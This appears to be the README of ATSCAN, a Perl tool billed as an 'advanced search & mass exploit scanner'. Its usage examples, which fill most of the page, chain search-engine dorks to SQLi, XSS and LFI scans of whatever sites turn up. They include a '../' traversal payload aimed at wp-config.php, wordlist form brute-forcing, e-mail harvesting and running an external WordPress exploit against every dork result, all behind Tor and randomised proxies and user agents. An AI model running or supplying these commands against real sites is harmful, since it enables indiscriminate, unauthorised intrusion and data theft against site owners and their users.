ATSCAN - Advanced Search & Mass Exploit Scanne

ATSCAN is an advanced search & mass exploit scanner written in Perl.

Features:

• Search engine Google / Bing / Ask / Yandex / Sogou 
• Mass Dork Search
• Multiple instant scans. 
• Mass Exploitation 
• Use proxy. 
• Random user agent. 
• Random engine.
• Extern commands execution.
• XSS / SQLI / LFI / AFD scanner.
• Filter WordPress and Joomla sites. 
• Find Admin page.
• Decode / Encode Base64 / MD5
• Ports scan. 
• Collect IPs
• Collect E-mails. 
• Auto-detect errors. 
• Auto-detects Cms.
• Post data.
• Auto sequence repeater.
• Validation.
• Post and Get method
• Interactive and Normal interface.
• And more...

Libraries to install:

• Perl Required. 
• Works on all platforms. Disponible in Blackarch Linux and Dracos systems.

Permissions:

cd ATSCAN
chmod +x ./atscan.pl

Installation:

chmod +x ./install.sh
./install.sh

Execution:

Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan

Uninstall Tool:

atscan --uninstall

Screenshots:

Commands:

--help / -h Help.
 --proxy         Set tor proxy for scans [EX: --proxy "socks://localhost:9050"]
                 Set proxy [EX: --proxy "http://12.45.44.2:8080"] 
                 Set proxy list [EX: --proxy list.txt]
 --motor / -m Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
 --proxy-random Random proxy [EX: --proxy-random list.txt] or --proxy-random "socks://localhost:9050"]
 --m-random Random of all disponibles engines
 --b-random Random all disponibles agents
 --freq         Random time frequency (in seconds)
 --time         set browser time out
 --dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
 --target / -t Target
 --level / -l Scan level (+- Number of page results to scan)
 --zone         Search engine country.
 --param / -p Set test parameter EX:id,cat,product_ID
 --save / -s Output.
 --source Html output file
 --content Print request content
 --data         Post and Get forms. See examples
 --post         Use post method
 --get         Use get method
 --header Set Headers
 --host         Domain name [Ex: site.com]
 --nobanner Hide tool banner
 --beep         Produce beep sound if positive scan found.
 --ifend         Produce beep sound when scan process is finished.
 --noinfo Jump extra results info.
 --ping         Host ping.
 --limit         Limit max positive scan results.
 --valid / -v Validate by string
 --status Validate by http header status
 --ifinurl Get targets with exact string matching
 --sregex Get targets with exact regex matching
 --none         Get negative validation or engine regex matching
 --notin         Get targets where string doesn't exist in HTML
 --unique Get targets with exact dork matching
 --replace Replace exact string
 --replaceFROM Replace from string to the end of target
 --payload Use your own payloads instead of tool ones
 --exp / -e Exploit/Payload will be added to full target
 --expHost Exploit will be added to the host
 --expIp         Exploit will be added to the host ip
 --sql         Xss scan
 --lfi         Local file inclusion
 --joomrfi Scan for joomla local file inclusion.
 --shell         Shell link [Ex: http://www.site.com/shell.txt]
 --wpafd         Scan wordpress sites for arbitrary file download
 --admin         Get site admin page
 --shost         Get site subdomains
 --tcp         TCP port
 --udp         UDP port
 --index         Get target engine index
 --wp         Wordpress sites in the server
 --joom         Joomla sites in the server
 --upload Get upload files
 --zip         Get zip files
 --md5         Convert to md5
 --encode64 Encode base64 string
 --decode64 decode base64 string
 --TARGET Will be replaced by target in extern command
 --HOST         Will be replaced by host in extern command
 --HOSTIP Will be replaced by host IP in extern command
 --PORT         Will be replaced by open port in extern command
 --ip         Crawl to get Ips
 --regex         Crawl to get strings matching regex
 --noquery Remove string value from Query url [ex: site.com/index.php?id=string]
 --command / -c Extern Command to execute
 --email         Get emails
 rang(x-y) EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?
                 id=rang(1-9)" --sqlsite.com/index.php?id=1 -> 9.
 repeat(txt-y) EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t 
                 "site.com/index.php?id=../wp-config.php"
                 In site.com/index.php?id=../wp-config.php then site.com/index.php?id=
                 ../../wp-config.php 9 times
 [OTHER]         To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
 [DATA/DATAFILE] To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
 --update Update tool
 --tool / -? Tool info.
 --config User configuration.
 --interactive Interactive mode interface.
 --uninstall Uninstall Tool.
 

Examples:

• PROXY:

Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].

Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080 

or --proxy list.txt Ex: --proxy my_proxies.txt 

• RANDOM:

Random proxy: --proxy-random [proxy list.txt] 

Random browser: --b-random 

Random engine: --m-random 

• SET HEADERS:

atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 

atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 

• SEARCH ENGINE:

Search: atscan --dork [dork] --level [level] 

Search: atscan -d [dork] -l [level] 

Set engine: atscan --dork [dork] --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] 

Set selective engines: atscan -d [dork] -l [level] -m 1,2,3.. 

Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level] 

Search and rand: atscan -d [dork] -l [level] --expHost "/index.php?id=rang(1-9)" --sql 

Get target engine index: atscan -t [target] --level [value] --index 

Get Server wordpress sites: atscan -t [target] --wp 

Search + output: atscan --dork [dorks.txt] --level [level] --save 

Search + get emails: atscan -d [dorks.txt] -l [level] --email 

Search + get site emails: atscan --dork site:site.com --level [level] --email 

Search + get ips: atscan --dork [dork] --level [level] --ip 

• REGULAR EXPRESSIONS:

Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex] 

IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) 

E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})' 

• REPEATER:

atscan -t site.com?index.php?id=rang(1-10) --sql 

atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql 

atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php" 

• PORTS:

atscan -t [ip] --port [port] [--udp / --tcp] 

atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp] 

atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"

• ENCODE / DECODE:

Generate MD5: --md5 [string] 

Encode base64: --encode64 [string] 

Decode base64: --decode64 [string] 

• DATA:

Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]

Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]

atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]

Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get] 

• EXTERNAL COMMANDES:

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET" 

atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST" 

atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP" 

atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET" 

• MULTIPLE SCANS:

atscan --dork [dork> --level [10] --sql --lfi --wp ..

atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]

atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]

atscan -t [target] [--sql / --lfi / --wp /...] 

• USER PAYLOADS:

atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]

• SEARCH VALIDATION:

atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string] 

atscan -d [dork / dorks.txt] -l [level] --status [code] --none (Positive when status does\'nt match)

atscan -d [dork / dorks.txt] -l [level] --status [code] / -v [string] / --ifinurl [string] / --sregex [regex] --none

atscan -d [dork / dorks.txt] -l [level] --ifinurl [string] 

atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string] 

atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string] 

atscan -d [dork / dorks.txt] -l [level] --unique 

• SCAN VALIDATION:

atscan -t [target / targets.txt] [--status [code] / --valid [string] 

atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string] 

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] 

atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string] 

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string] 

atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string] 

atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string] 

atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]

atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string] 

atscan -t [target / targets.txt] --valid [string] --not in [string]

• UPDATE TOOL:

atscan --update 

Download ATSCAN